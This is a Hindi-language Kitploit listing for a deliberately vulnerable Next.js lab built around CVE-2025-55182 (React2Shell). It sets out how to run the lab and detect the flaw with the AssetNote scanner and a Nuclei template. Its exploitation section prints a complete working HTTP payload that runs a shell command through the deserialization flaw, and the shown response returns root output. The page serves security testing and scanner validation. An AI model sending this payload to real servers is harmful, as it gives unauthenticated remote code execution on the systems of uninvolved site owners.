Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Unihackers---CVE-2025-55182- — CVE-2025-55182 (React2Shell RCE) के लिए PoC एक्सप्लॉइट और डिटेक्शन टेम्पलेट के साथ जानबूझकर कमजोर Next.js वातावरण, सुरक्षा परीक्षण और स्कैनर सत्यापन सक्षम करना। | Kitploit
उपकरण/GitHubGitHub/sairbo/unihackers---cve-2025-55182-
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubsairbo/unihackers---cve-2025-55182-

Unihackers---CVE-2025-55182-

CVE-2025-55182 (React2Shell RCE) के लिए PoC एक्सप्लॉइट और डिटेक्शन टेम्पलेट के साथ जानबूझकर कमजोर Next.js वातावरण, सुरक्षा परीक्षण और स्कैनर सत्यापन सक्षम करना।

रिपॉजिटरी देखें
217 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

इटालियन गैंग

React2Shell PoC

यह रिपॉजिटरी एक न्यूनतम जानबूझकर कमजोर वातावरण प्रदान करता है ताकि React Server Components और Next.js को प्रभावित करने वाली हालिया गंभीर RCE कमजोरी (React2Shell) के विरुद्ध सुरक्षा स्कैनर का परीक्षण किया जा सके।

CVE-2025-55182: React Server Components के संस्करण 19.0.0, 19.1.0, 19.1.1, और 19.2.0 में एक प्री-ऑथेंटिकेशन रिमोट कोड एक्जीक्यूशन कमजोरी मौजूद है, जिसमें निम्नलिखित पैकेज शामिल हैं: react-server-dom-parcel, react-server-dom-turbopack, और react-server-dom-webpack। कमजोर कोड HTTP अनुरोधों से सर्वर फंक्शन एंडपॉइंट्स तक पेलोड को असुरक्षित रूप से डिसीरियलाइज़ करता है।

CVE-2025-66478: App Router का उपयोग करने वाले Next.js एप्लिकेशन पर डाउनस्ट्रीम प्रभाव को ट्रैक करता है।

[!Warning] यह सेटअप जानबूझकर कमजोर है और इसे कभी भी सार्वजनिक इंटरनेट पर उजागर नहीं किया जाना चाहिए या उत्पादन में उपयोग नहीं किया जाना चाहिए।


यह क्या है

यह ऐप एक बहुत छोटा Next.js प्रोजेक्ट है जो:

  • कमजोर संस्करणों को पिन करता है:
    • next: 16.0.6
    • react:
19.2.0
  • react-dom: 19.2.0
  • App Router और React सर्वर एक्शन के साथ एक न्यूनतम NextJS कॉन्फिग का उपयोग करता है
  • [!TIP] react और react-dom को पिन करना वैकल्पिक है, क्योंकि एक प्रभावित next संस्करण डिफ़ॉल्ट रूप से App Router के कारण संवेदनशील है।

    कैसे चलाएं

    root@kitploit:~
    docker run --rm -p 127.0.0.1:3000:3000 ghcr.io/l4rm4nd/cve-2025-55182:latest
    

    कैसे पता लगाएं

    AssetNote Scanner

    AssetNote द्वारा प्रदान किए गए स्कैनर का उपयोग करें:

    root@kitploit:~
    git clone https://github.com/assetnote/react2shell-scanner && cd react2shell-scanner
    virtualenv venv && source venv/bin/activate && pip install -r requirements.txt
    
    python3 scanner.py -u http://127.0.0.1:3000
    

    वापस आएगा:

    root@kitploit:~
    ╰─(venv) ⠠⠵ python3 scanner.py -u http://127.0.0.1:3000             
    
    brought to you by assetnote
    
    [*] Loaded 1 host(s) to scan
    [*] Using 10 thread(s)
    [*] Timeout: 10s
    [*] Using RCE PoC check
    [!] SSL verification disabled
    
    [VULNERABLE] http://127.0.0.1:3000 - Status: 303
    

    Nuclei

    root@kitploit:~
    nuclei -t ./nuclei-template/CVE-2025-55182.yaml -u http://127.0.0.1:3000
    

    वापस आएगा:

    root@kitploit:~
    [INF] Templates loaded for current scan: 1
    [WRN] Loading 1 unsigned templates for scan. Use with caution.
    [INF] Targets loaded for current scan: 1
    [CVE-2025-55182] [http] [critical] http://127.0.0.1:3000
    

    कैसे शोषण करें

    यहाँ से PoC HTTP पेलोड here.

    root@kitploit:~
    POST / HTTP/1.1
    Host: localhost:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
    Next-Action: x
    X-Nextjs-Request-Id: b5dce965
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
    X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
    Content-Length: 740
    
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
    Content-Disposition: form-data; name="0"
    
    {
      "then": "$1:__proto__:then",
      "status": "resolved_model",
      "reason": -1,
      "value": "{\"then\":\"$B1337\"}",
      "_response": {
        "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
        "_chunks": "$Q2",
        "_formData": {
          "get": "$1:constructor:constructor"
        }
      }
    }
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
    Content-Disposition: form-data; name="1"
    
    "$@0"
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
    Content-Disposition: form-data; name="2"
    
    []
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
    
    

    वापस आएगा:

    root@kitploit:~
    HTTP/1.1 500 Internal Server Error
    Vary: rsc, next-router-state-tree, next-router-prefetch, next-router-segment-prefetch, Accept-Encoding
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    x-nextjs-cache: HIT
    x-nextjs-prerender: 1
    Content-Type: text/x-component
    Date: Fri, 05 Dec 2025 11:53:05 GMT
    Connection: keep-alive
    Keep-Alive: timeout=5
    Content-Length: 195
    
    0:{"a":"$@1","f":"","b":"PAoMR732SpRI6Xw9cbfbD"}
    1:E{"digest":"uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"}
    
    
    छवि
    टूल डाउनलोड करें